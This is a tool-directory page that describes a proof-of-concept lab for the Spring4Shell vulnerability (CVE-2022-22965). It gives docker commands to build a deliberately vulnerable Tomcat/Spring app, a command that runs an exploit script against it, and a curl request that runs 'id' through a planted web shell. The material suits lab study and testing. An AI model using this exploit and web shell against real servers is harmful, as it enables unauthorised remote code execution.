Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-22965-Spring4Shell — PoC and exploit for CVE-2022-22965 Spring4Shell | Kitploit
Tools/GitHubGitHub/jakabakos/cve-2022-22965-spring4shell
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubjakabakos/cve-2022-22965-spring4shell

CVE-2022-22965-Spring4Shell

PoC and exploit for CVE-2022-22965 Spring4Shell

View Repository
2213 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Spring4Shell

Spring4Shell (CVE-2022-22965) Proof Of Concept with a vulnerable Tomcat server with a vulnerable spring4shell application.

Details about this vulnerability

  • https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
  • https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
  • https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

How to use

Build the image

root@kitploit:~
docker build . -t spring4shell

Run the container

root@kitploit:~
docker run -p 80:8080 spring4shell

You can also run it with the debugger port exposed if needed:

root@kitploit:~
docker run -p 80:8080 –p 5005:5005 spring4shell

See the original blog post for the details of setting up a remote debugger in IntelliJ Idea!

Run the exploit

root@kitploit:~
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell

Then, you can run any command remotely like this:

root@kitploit:~
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -

...or by visiting the URL above.

Download Tool